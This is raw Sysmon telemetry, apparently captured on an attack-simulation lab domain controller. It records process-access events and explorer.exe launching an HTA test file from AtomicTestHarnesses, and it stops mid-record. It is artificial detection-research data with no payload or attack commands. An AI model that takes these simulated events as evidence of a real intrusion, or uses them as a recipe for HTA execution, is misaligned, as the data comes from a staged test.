ll+51791 10341000x800000000000000030659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.848{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.836{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.836{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.833{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.817{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.817{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.817{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.817{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.817{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.817{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.829{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000030648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.817{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F106-00000000A301}6692C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.770{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F106-00000000A301}6692C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.770{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F106-00000000A301}6692C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.739{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-55CB-6008-F106-00000000A301}6692C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.739{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.739{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.739{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.739{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.739{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-55CB-6008-F106-00000000A301}6692C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F106-00000000A301}6692C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000030638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.707{7901BC46-55CB-6008-F106-00000000A301}6692C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEexplorer.exe "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-55CB-6008-F006-00000000A301}1092C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000030637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.692{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9